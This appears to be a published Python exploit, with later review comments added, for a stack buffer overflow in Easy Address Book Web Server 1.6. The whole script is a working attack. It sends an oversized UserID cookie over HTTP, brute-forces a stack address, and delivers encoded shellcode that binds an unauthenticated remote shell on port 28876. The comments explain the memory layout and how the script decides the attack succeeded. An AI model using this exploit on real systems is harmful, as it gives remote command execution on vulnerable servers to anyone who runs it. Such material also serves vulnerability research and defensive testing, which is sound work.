
Easy Address Book Web Server 1.6 Buffer Overflow

Posted on 22 May 2014

#!/usr/bin/env python
# Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link: http://www.efssoft.com/eabws.exe
# Version: 1.6
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX, which
# gives us control of execution flow when "call dword ptr [edx+28h]" is
# executed. EDX is overwritten with an address pointing to a location on the
# stack, which in turn points to a NOP sled leading to the shellcode. This
# stack address is brute forced, but that doesn't take long since only the
# 2nd byte varies, so the address is always of the form 0x01??B494.
#
# It's similar to the Easy File Sharing Web Server 6.8 exploit here:
# http://www.exploit-db.com/exploits/33352/ -- I suspect the same code is
# reused across their Web Server series of applications.
#
# Tested with Easy Address Book Web Server installed in the default location
# at C:\EFS Software\Easy Address Book Web Server
#
# The exploit can sometimes fail the first time, so try a few more times and
# you might get a shell.
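from __future__ import print_function

import socket
import struct
import sys

# Default target. Both can be overridden on the command line: host [port].
target = "172.16.229.134"
port = 80

# Port the shellcode binds a shell on. The bind shell has no authentication:
# anything that can reach this port on the victim gets the shell, not just us.
BIND_PORT = 28876

# Per-connection timeout in seconds. Without one, a filtered port would block
# each of the 254 attempts for the OS default connect timeout.
TIMEOUT = 5.0

# Candidate EDX values have the form 0x01??B494; only the second byte varies.
STACK_GUESS_BASE = 0x0100B494
# The NOP sled is this many bytes past the guessed address (taken from the
# original exploit; not independently verified here).
NOP_SLED_OFFSET = 129
PADDING_LEN = 76
NOP_SLED_LEN = 20

# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Binds a shell on port 28876
# msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
#
# NOTE(review): only \x00 and \x20 were excluded when encoding, so the encoded
# bytes still contain 0x0a and 0x0d, which an HTTP parser could treat as line
# terminators. The author reports success with this buffer, so the server
# presumably copies the raw request; check this first if the exploit never
# fires against a different build.
shellcode = (
    b"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9"
    b"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef"
    b"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0"
    b"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c"
    b"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5"
    b"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c"
    b"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0"
    b"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74"
    b"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6"
    b"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6"
    b"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a"
    b"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a"
    b"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb"
    b"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1"
    b"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04"
    b"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc"
    b"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7"
    b"\x3e\x57\xf9"
)


def stack_guess(i):
    """Return the candidate EDX value for attempt *i*: 0x01??B494 with ?? = i.

    This is the value used in "call dword ptr ds:[edx+28]"; only the second
    byte of the stack address changes between runs.
    """
    return STACK_GUESS_BASE | (i << 16)


def build_payload(guess):
    """Return the UserID cookie value for one guessed stack address.

    Layout: pointer to the NOP sled, padding, the guessed address (the
    location that ends up holding the pointer to the NOP sled), the NOP sled,
    then the shellcode.
    """
    nop_sled_addr = guess + NOP_SLED_OFFSET
    return b"".join([
        struct.pack("<I", nop_sled_addr),   # pointer to the NOP sled
        b"A" * PADDING_LEN,                 # padding
        struct.pack("<I", guess),           # address containing the pointer above
        b"\x90" * NOP_SLED_LEN,             # NOP sled
        shellcode,                          # win!
    ])


def build_request(host, http_port, payload):
    """Return the raw HTTP request that carries *payload* in the UserID cookie.

    Header lines are CRLF-terminated and the request ends with the blank line
    HTTP/1.1 requires; the cookie value is sent as raw bytes, unencoded.
    """
    host_bytes = host.encode("ascii")
    return b"".join([
        b"GET /addrbook.ghp HTTP/1.1\r\n",
        b"User-Agent: Mozilla/4.0\r\n",
        b"Host:" + host_bytes + b":" + str(http_port).encode("ascii") + b"\r\n",
        b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
        b"Accept-Language: en-us\r\n",
        b"Accept-Encoding: gzip, deflate\r\n",
        b"Referer: http://" + host_bytes + b"/\r\n",
        b"Cookie: SESSIONID=6771; UserID=" + payload + b"; PassWD=;\r\n",
        b"Conection: Keep-Alive\r\n",  # sic: header name kept as in the original
        b"\r\n",
    ])


def port_open(host, tcp_port, timeout=TIMEOUT):
    """Return True if a TCP connection to host:tcp_port succeeds within timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, tcp_port))
        return True
    except socket.error:
        return False
    finally:
        sock.close()


def send_request(host, http_port, data, timeout=TIMEOUT):
    """Deliver *data* to host:http_port over a single TCP connection.

    Returns None on success, otherwise the socket error explaining why the
    request could not be delivered. The original swallowed every exception
    here, which hid an unreachable (or already crashed) target from the
    operator.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, http_port))
        sock.sendall(data)  # send() may deliver only part of the buffer
    except socket.error as err:
        return err
    finally:
        sock.close()
    return None


def main(argv):
    """Brute-force the stack address and report whether the bind shell came up.

    Returns 0 when a connection to the bind port succeeds, 1 when every guess
    failed or the pre-flight check refuses to run.
    """
    host = argv[1] if len(argv) > 1 else target
    http_port = int(argv[2]) if len(argv) > 2 else port

    # The only success signal is "can I connect to the bind port", so a port
    # that is already open before we start would be reported as a shell.
    if port_open(host, BIND_PORT):
        print("[!] %s:%d is already open; the success check would be meaningless."
              % (host, BIND_PORT))
        return 1

    for i in range(1, 255):
        guess = stack_guess(i)
        print("[+] Trying guess at 0x%08x" % guess)
        request = build_request(host, http_port, build_payload(guess))
        err = send_request(host, http_port, request)
        if err is not None:
            print(" [!] Could not deliver the request to %s:%d: %s"
                  % (host, http_port, err))
        # NOTE(review): as in the original there is no pause between delivery
        # and this check; if the shell needs time to bind, a short sleep here
        # may reduce false "Didn't work" results -- untested.
        if port_open(host, BIND_PORT):
            print(" [+] Success! A shell is waiting on port 28876!")
            return 0
        print(" [!] Didn't work. Sometimes it takes a few tries, so try again.")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))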

 
